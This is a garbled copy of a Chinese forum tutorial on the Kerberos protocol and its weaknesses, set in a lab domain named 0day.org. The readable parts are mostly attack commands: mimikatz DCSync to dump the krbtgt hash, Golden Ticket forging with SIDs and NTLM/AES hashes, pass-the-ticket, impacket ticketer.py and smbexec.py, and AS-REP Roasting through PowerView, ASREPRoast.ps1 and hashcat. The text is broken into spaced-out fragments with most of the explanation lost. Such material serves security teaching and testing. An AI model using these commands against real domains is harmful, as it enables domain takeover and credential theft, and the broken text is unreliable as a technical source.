[18593] 2021-07-07_干货全网最详细的Kerberos协议及其漏洞

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2021-07-07_干货全网最详细的Kerberos协议及其漏洞   |   K e r b e r o s   1 1 c c a a b   H A C K   2 0 2 1 - 0 7 - 0 7 # K e r b e r o s   , 4 #   , 4 #   , 2 0 D C K D C A D A S K e r b e r o s T G T T G T A S T G S S T S T T G S k r b t g t  
( s e r v e r 0 8 ) : 1 9 2 . 1 6 8 . 3 . 1 4 2 s e r v e r 0 8 1 9 2 . 1 6 8 . 3 . 6 8 A S - R E Q K D C A S T G T T G T K D C A S 1 A S - R E Q 访 K e r b e r o s K D C A S A S - R E Q       A u t h e n t i c a t o r ( N T L M H a s h ) * *     * *
A S - R E Q 1 . H A S H A S - R E Q H a s h A u t h e n t i c a t o r h a s h
  K B 2 8 7 1 9 9 7   P T K 2 . A S - R E Q     c n a m e   u s e r . t x t @ 0 d a y . o r g 使 u d p
3 . n t l m   h a s h A S - R E P 2 A S - R E P K D C A D H a s h H a s h A u t h e n t i c a t o r K A S k r b t g t N T L M   H a s h T G T ( t i c k e t )     N T L M   H a s h L o g i n   S e s s i o n   k e y (   e n c - p a r t   )   L o g i n S e s s i o n   K e y K D C T G T L g o i n   S e s s i o n   K e y   P A C P A C S I D
e n c - p a r t L o g i n   s e s s i o n   k e y A S - R E P 西   L o g i n   s e s s i o n - k e y     t i c k e t   . c c a c h e     . k i r b i   m i m i k a t z k e k e o r u b e u s   . k i r b i   i m p a c k e t     . c c a c h e   L o g i n   s e s s i o n - k e y       t i c k e t A S - R E P 1 .   A S - R E P     T G T     k r b t g t   H a s h   k r b t g t     h a s h   T G T ( ) S I D ( S I D ) k r b t g t A E S - 2 5 6 1 . 使 使 m i m i k a t z k r b t g t   h a s h
s i d S - 1 - 5 - 2 1 - 1 8 1 2 9 6 0 8 1 0 - 2 3 3 5 0 5 0 7 3 4 - 3 5 1 7 5 5 8 8 0 5 n t l m   h a s h 3 6 f 9 d 9 e 6 d 9 8 e c f 8 3 0 7 b a f 4 f 4 6 e f 8 4 2 a 2 a e s 2 5 6 d b c 5 5 f 9 f 9 2 5 d e 5 a 4 8 2 d 3 b f 5 e d e 7 d 0 d 4 6 d 4 b 1 2 1 c 0 1 b d d 9 d 0 6 b e 4 a e d 3 6 7 2 1 2 d 3 f 9 a d m i n i s t r a t o r ( a e s 2 5 6 ) a d m i n i s t r a t o r ( k r b t g t   h a s h ) g o l d . k i r b i G o l d e n   T i c k e t   .   i p 2 . 使 使 i m p a c k e t 使 k a l i d n s m i m i k a t z . e x e   " l s a d u m p : : d c s y n c   / d o m a i n : 0 d a y . o r g   / u s e r : k r b t g t " m i m i k a t z   " k e r b e r o s : : g o l d e n   / d o m a i n : 0 d a y . o r g   / s i d : S - 1 - 5 - 2 1 - 1 8 1 2 9 6 0 8 1 0 - 2 3 3 5 0 5 0 7 3 4 - 3 5 1 7 5 5 8 8 0 5 / a e s 2 5 6 : d b c 5 5 f 9 f 9 2 5 d e 5 a 4 8 2 d 3 b f 5 e d e 7 d 0 d 4 6 d 4 b 1 2 1 c 0 1 b d d 9 d 0 6 b e 4 a e d 3 6 7 2 1 2 d 3 f 9   / u s e r : a d m i n i s t r a t o r / t i c k e t : g o l d . k i r b i " m i m i k a t z   " k e r b e r o s : : g o l d e n   / d o m a i n : 0 d a y . o r g   / s i d : S - 1 - 5 - 2 1 - 1 8 1 2 9 6 0 8 1 0 - 2 3 3 5 0 5 0 7 3 4 - 3 5 1 7 5 5 8 8 0 5 / k r b t g t : 3 6 f 9 d 9 e 6 d 9 8 e c f 8 3 0 7 b a f 4 f 4 6 e f 8 4 2 a 2   / u s e r : a d m i n i s t r a t o r   / t i c k e t : g o l d . k i r b i " k e r b e r o s : : p t t   C : U s e r s j a c k . 0 D A Y D e s k t o p g o l d . k i r b i
a d m i n i s t r a t o r . c c a c h e   ` ` `   p y t h o n 3   t i c k e t e r . p y   - d o m a i n - s i d   S - 1 - 5 - 2 1 - 1 8 1 2 9 6 0 8 1 0 - 2 3 3 5 0 5 0 7 3 4 - 3 5 1 7 5 5 8 8 0 5   - n t h a s h 3 6 f 9 d 9 e 6 d 9 8 e c f 8 3 0 7 b a f 4 f 4 6 e f 8 4 2 a 2   - d o m a i n   0 d a y . o r g   a d m i n i s t r a t o r   ` ` ` 访 2 . A S - R E P   R o a s t i n g A S - R E P   e n c - p a r t     H a s h     D o   n o t   r e q u i r e   K e r b e r o s e x p o r t   K R B 5 C C N A M E = a d m i n i s t r a t o r . c c a c h e p y t h o n 3   s m b e x e c . p y   - n o - p a s s   - k   O W A 2 0 1 0 S P 3 . 0 d a y . o r g
p r e a u t h e n t i c a t i o n   8 8     A S _ R E Q   A S _ R E P ( e n c - p a r t c i p e r 使   h a s h     L o g i n   S e s s i o n   K e y 线 h a s h ) K e r b e r o s   5 A S - R E P   e t y p e   2 3 ( 1 8 2 0 0 ) 使 h a s h c a t   A S - R E P R o a s t i n g A S - R E P h a s h s e s s i o n k e y - a s j o h n 线
使 E m p i r e p o w e r v i e w . p s 1   " k e r b e r o s "   使 A S R E P R o a s t . p s 1 A S - R E P H a s h I m p o r t - M o d u l e   . p o w e r v i e w . p s 1   G e t - D o m a i n U s e r   - P r e a u t h N o t R e q u i r e d I m p o r t - M o d u l e   . A S R E P R o a s t . p s 1 G e t - A S R E P H a s h   - U s e r N a m e   j a c k   - D o m a i n   0 d a y . o r g   |   O u t - F i l e   - E n c o d i n g   A S C I I   h a s h . t x t
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则